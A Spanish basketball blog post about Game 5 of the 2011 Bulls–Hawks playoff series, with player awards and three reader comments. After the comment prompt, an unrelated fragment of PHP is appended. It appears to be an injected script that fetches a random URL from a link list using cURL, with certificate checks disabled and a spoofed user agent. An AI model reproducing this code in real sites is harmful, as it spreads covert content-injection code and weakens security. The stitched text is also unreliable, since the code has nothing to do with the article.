Playoffs (10/03/2011): Camino del séptimo

11 de May de 2011 por txusma

Los Bulls se encuentran ya a un solo paso de alcanzar las semifinales de conferencia, algo que no conseguían desde hace más de 10 años. Anoche se impusieron a los Hawks en el United Center gracias a un último cuarto fantástico de Derrick Rose y Taj Gibson y se encuentran en disponibilidad de cerrar la serie mañana jueves en Atlante. De todas maneras esto tiene toda la pinta de resolverse en 7 partidos y de mantener la emoción hasta el último momento.

Como en cada derrota, Atlanta se vio lastrado por el mal rendimiento de su pareja de anotadores, Joe Johson y Jamal Crawford, sobretodo este último. Se demuestra una vez más que ellos tienen la clave de la eliminatoria. En su “ausencia” fue de nuevo Jeff Teague el que tiró del carro con ayudas de Josh Smith, Al Horford y Zaza Pachulia. El partido llegó igualado hasta el último cuarto en el que Derrick Rose, con 11 puntos, los mismos que Taj Gibson, ejerció de MVP, cogió el mando y marcó las diferencias (83-95). 

PREMIOS

MVP: Derrick Rose fue la estrella indiscutible del partido con 33 puntos y 9 asistencias. En período definitivo anotó 11 puntos y repartió 3 asistencias con un 50% de acierto en el tiro. Ahí es donde hay que aparecer.

Sorpresa: Taj Gibson anotó sus 11 puntos en el momento más importante, el último cuarto. Este año ha sido relegado por Carlos Boozer pero siempre que tiene oportunidad demuestra que tiene un imporante papel en el equipo.

Decepción: Si una tus principales armas se queda en 1 de 9 en tiros de campo, no hay nada que hacer. Sin una buen partido de Jamal Crawford, los Hawks pierden muchas posibilidades de alzarse con la victoria.

Esfuerzo en vano: Si alguien le dice hace unos meses a Jeff Teague que sería el mejor jugador de su equipo en el 5º partido de unas semifinales de conferencia seguro que se hubiera echado a reir. Pues lo fue, 21 puntos y 4 asistencias para él. Recordemos que además le toca defender a Rose y no lo hace nada mal.

Imágenes | AP Photos / Getty Images

Comenta

3 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Venga, que hay ganas de ver un séptimo, ya va tocando!

      Citar

  2. JHC dice:
    #2

    esperemos k si por el bn de mis hawks, Crawford mas vale k se espabile en el tiro porke esta fatal ultimamente… x cierto si alguien kiere jugar a un juego de baloncesto que me avise es una liga hoops pero con franquicias reales… ya al que quiera le explico contra mas rapido os apunteis mas buen equipo podreis cojer

      Citar

  3. GreenPride dice:
    #3

    De-fense, De-fense!!! Es cierto que los Bulls ganaron gracias al último gran cuarto en ataque de Rose y Gibson pero aún más importante para mí fue la gran defensa que hicieron en este periodo. El partido empezó con Deng muy fuerte y los Hawks resistiendo gracias a sus interiores Horford, Smith y Pachulia. Esta vez tocó partido out de Crawford y no muy alla de JJ pero a pesar de ello los Hawks entraron al último cuarto poniéndose incluso por delante gracias a un Jeff Teague que está siendo importantísimo y por momentos el mejor Hawk sobre la cancha dando muchos dolores de cabeza a Rose en defensa. Sin embargo al final no pudieron aguantar el ataque de Rose y la aparición estelar de Gibson y también de Asik en defensa que suplieron a una pareja Noah-Boozer que no acaba de estar bien del todo en los playoffs. Yo también creo que esto acabará en 5º partido.
    Y esta noche a ver probablemente la última demostración de orgullo verde, seguro que van a vender muy cara su eliminación aunque no creo que puedan evitarla y un interesantísimo 5º partido Thunder-Grizzlies tras las 3 prorrogas veremos si los Osos tienen lo que hace falta para plantar cara

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>